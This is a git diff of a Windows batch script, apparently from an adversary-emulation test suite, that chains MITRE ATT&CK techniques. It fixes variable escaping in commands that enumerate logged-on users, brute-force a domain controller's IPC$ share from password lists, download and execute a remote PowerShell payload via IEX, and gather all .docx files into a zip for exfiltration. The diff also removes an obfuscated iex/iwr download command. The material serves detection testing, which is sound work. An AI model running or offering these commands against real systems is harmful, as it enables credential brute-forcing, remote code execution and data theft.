diff --git a/ARTifacts/Chain_Reactions/chain_reaction_Reactor.bat b/ARTifacts/Chain_Reactions/chain_reaction_Reactor.bat index de702686..1064f19f 100644 --- a/ARTifacts/Chain_Reactions/chain_reaction_Reactor.bat +++ b/ARTifacts/Chain_Reactions/chain_reaction_Reactor.bat @@ -7,18 +7,18 @@ :: Single Endpoint -:: for /F "tokens=1,2" %i in ('qwinsta /server: ^| findstr "Active Disc"') do @echo %i | find /v "#" | find /v "console" || echo %j > usernames.txt +:: for /F "tokens=1,2" %%i in ('qwinsta /server: ^| findstr "Active Disc"') do @echo %%i | find /v "#" | find /v "console" || echo %%j > usernames.txt :: Multiple Endpoints -@FOR /F %n in (computers.txt) DO @FOR /F "tokens=1,2" %i in (‘qwinsta /server:%n ^| findstr "Active Disc"’) do @echo %i | find /v "#" | find /v "console" || echo %j > usernames.txt +@FOR /F %%n in (computers.txt) DO @FOR /F "tokens=1,2" %%i in ('qwinsta /server:%%n ^| findstr "Active Disc"’) do @echo %%i | find /v "#" | find /v "console" || echo %%j > usernames.txt :: Tactic: Credential Access, Lateral Movement :: Technique: Brute Force: https://attack.mitre.org/wiki/Technique/T1110 :: Technique: Windows Admin Shares: https://attack.mitre.org/wiki/Technique/T1077 -@FOR /F %n in (usernames.txt) DO @FOR /F %p in (passwords.txt) DO @net use \\COMPANYDC1\IPC$ /user:COMPANY\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete \\COMPANYDC1\IPC$ > NUL +@FOR /F %%n in (usernames.txt) DO @FOR /F %%p in (passwords.txt) DO @net use \\COMPANYDC1\IPC$ /user:COMPANY\%%n %%p 1>NUL 2>&1 && @echo [*] %%n:%%p && @net use /delete \\COMPANYDC1\IPC$ > NUL :: Tactic: Discovery @@ -38,17 +38,12 @@ tasklist.exe | findstr defender powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Discovery.bat')" -:: Tactic: Execution -:: Technique: Powershell: https://attack.mitre.org/wiki/Technique/T1086 - -:: cmd /c "set apple=fish (cars help://bit.ly/L3g1t).content&&cmd /c set boat=%apple:fish=iex% ^&^&cmd /c set ab=%boat:cars=iwr% ^^^&^^^&cmd /c echo %ab:el=tt%|%ProgramData:~3,1%%ProgramData:~5,1%we%ProgramData:~7,1%she%Public:~12,1%%Public:~12,1% -" - :: Tactic: Collection :: Technique: Automated Collection: https://attack.mitre.org/wiki/Technique/T1119 -for /R c: %f in (*.docx) do copy %f c:\temp\ +for /R c: %%f in (*.docx) do copy %%f c:\temp\ :: Tactic: Exfiltration :: Technique: Data Compressed: https://attack.mitre.org/wiki/Technique/T1002 -cmd.exe /c powershell.exe dir c:\temp -Recurse | Compress-Archive -DestinationPath C:\temp\allthedataz.zip +cmd.exe /c powershell.exe Compress-Archive -Path C:\temp\* -CompressionLevel Optimal -DestinationPath C:\temp\allthedataz.zip